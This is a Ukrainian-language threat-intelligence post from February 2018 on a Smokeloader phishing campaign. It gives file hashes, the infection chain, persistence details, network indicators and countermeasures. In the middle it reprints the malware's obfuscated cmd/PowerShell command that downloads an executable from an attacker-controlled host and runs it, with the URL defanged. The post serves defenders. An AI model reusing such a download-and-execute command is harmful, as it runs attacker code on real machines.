Archive | 01/02/2018

IOC_smokeldr_300118

Доброго дня, панове.

31 січня о другій половині дня були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядалися раніше тут, тут і тут).

Може використовуватися для збору інформації та/або для доставки ransomware чи засобів майнінгу криптовалют.

Приклад фішингу із приєднанням:

Трохи аналітики:

  • Зверніть увагу на претекст середньої якості (без підпису і з нормальними заголовками)
  • Рівень загрози – середній, для організацій, що прислухалися до наших попередніх рекомендацій – низький.
  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня а також 11 листопада
  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Сервер, що розповсюджує основну частину = сервер контролю
  • Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Зважаючи на “почерк” цієї команди, ми припускаємо, що могли бути й інші спроби доставки цього коду не лише з сервісів РФ, але й із скомпрометованих скриньок/серверів вітчизняних установ

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\5541.exe

Маркери IOC:

скрипт приманка:

File name гарантійний лист.js
SHA-256 aabd7951f147d05a2f92caf35f1fe45e43eb6a05deaab451e0086c74e4289e2f
File size 18.8 KB

адреса на яку вказує скрипт:

$env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe

основна частина:

File name crsse.exe >> %temp%\5541.exe
SHA-256 45b3091d63c462eda461bae08e3d781665ce10e3dacd6ef7169f630a11109a3e
File size 340 KB

Отже, запуск скрипта ініціює завантаження основної частини засобами Powershell

(!) зверніть увагу – на відміну від попередньої розсилки, передачу команд зробили з конкатенацією (розбили на шматки)

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\5541.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у (співпадає з попередньою розсилкою)

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
Chromium 
c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

(!) зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows (штатний режим) а з C:\Windows\SYSWOW64\

Мережеві IOC:

завантаження payload – станом на 10ту ранку 1го лютого досі активна!

45.32.179.137:80 HTTP enterwords[.]ru GET /uadoc/crsse.exe

трафік скомпрометованої системи – сервер контролю

45.32.179.137:80 HTTP abank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe та Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR